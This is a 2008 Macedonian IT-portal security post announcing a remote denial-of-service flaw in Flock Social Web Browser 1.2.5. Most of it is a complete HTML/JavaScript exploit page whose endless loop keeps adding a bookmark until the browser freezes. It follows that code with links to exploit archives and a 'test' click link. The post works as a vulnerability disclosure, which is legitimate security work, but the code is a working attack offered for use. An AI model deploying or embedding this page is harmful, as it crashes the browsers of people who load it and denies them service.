IT.com.mk - Македонски ИТ портал - Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit

Компјутерска сигурност

Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи

RSS Канал
Е-пошта
Биографија

Ѓоко Крстиќ

Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit

Автор: Ѓоко Крстиќ
Објавено на: 09.09.2008
Социјалниот веб прелистувач Flock, (Mozilla) е ранлив на Denial of Service (DoS) напад, при кој апликацијата замрзнува (не реагира) и станува недостапна за легитимните корисници. Со помош на специјален html код и JavaScript доаѓа до повторување (loop) на функција за импортирање на favorites, поточно сајтот http://www.zeroscience.org со наслов DoS. Следува експлоатациски код: ---------------------------------------------------------код---------------------------------------------- <!----------------------------------------------0 \|\| \| Flock Web Browser 1.2.5 Remote DoS Exploit\| \| \| \| by Gjoko 'LiquidWorm' Krstic\| \| \| \| http://www.zeroscience.org\| \| \| \| liquidworm [t00t] gmail.com\| \| \| \| 06.09.2008\| \| \| 0-----------------------------------------------> <html> <title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</Title> <head> <br /><br /> <center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1> <br /><h2><kbd>Freezed/Locked - Not Responding...</kbd></h2></center> <body> <script type="text/javaScript"> function Xploit() { title="DoS"; url="http://www.zeroscience.org"; if (window.sidebar) { window.sidebar.addPanel(title, url,""); } else if( window.external ) { window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return (true); } } for (n=0; n<n+1; n++) Xploit(); </script> <center> <a href="http://www.zeroscience.org/codes/flock_dos.html"> <i>http://www.zeroscience.org/codes/flock_dos.html</i></a> </center> </body> </head> </html> <!-- thanks to Gianni Amato --> ---------------------------------------------------------код---------------------------------------------- Референти: - http://www.milw0rm.com/exploits/6391 - http://www.securityfocus.com/bid/31044 - http://www.packetstormsecurity.org/filedesc/flockweb-dos.txt.html - http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6492 - http://governmentsecurity.org/forum/?showtopic=29966 - http://www.securityhome.eu/exploits/exploit.php?eid=166956535348c327e8326d16.07779197 - http://securityreason.com/exploitalert/4617 - http://heapoverflow.com - http://www.buslab.org/index.php/content/view/256889/2/ - http://www.congoo.com/news/2008September7/Flock-Infinite-Loop-Multiple-Denial - http://www.hacker.com.cn/news/view.asp?id=1775 - http://www.unix-cn.biz/sh/f14/flock-social-web-browser-1-2-a-12000.html - http://en.securitylab.ru/poc/359028.php - http://www.xp10.cc/xp10/t34825.html - http://www.zeroscience.org/codes/flock_dos.txt Тест: КЛИК (Со внимание!) Клучни зборови: Flock Social Web browser DoS Denial of Service Exploit Слабост Експлоатација JavaScript

Сподели:

Последни написи на Ѓоко

Измами со кредитни картички
објавено на 07.06.2009 во Сигурност

Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност

SEAT
објавено на 15.03.2009 во Сигурност

w3af - Конструкција за Напад и Ревизија на Веб Апликации
објавено на 03.03.2009 во Сигурност

Secunia - Сигурносен извештај за 2008 година
објавено на 27.02.2009 во Сигурност

Робот vs. човек

Робот веќе има убиено човек. Во летото во 1981, електро инжинер поправал еден индустриски робот во Јапонија во фабрика за гуми, кога одеднаш роботот почнал да ги извршува своите функции... инжинерот, кој се нашол на неговиот пат бил зафатен од рачките на машината.

Тркалезна маса за активно граѓанско учество
Во рамките на Проектот за децентрализиран...
07.07.2009

WebFest: Најдобри регионални проекти
WebFest е првиот регионален фестивал кој има �...
15.09.2009

biZbuZZ 2009
Од 28-30 Октомври, 2009 во хотелот "Видиковац" в...
28.10.2009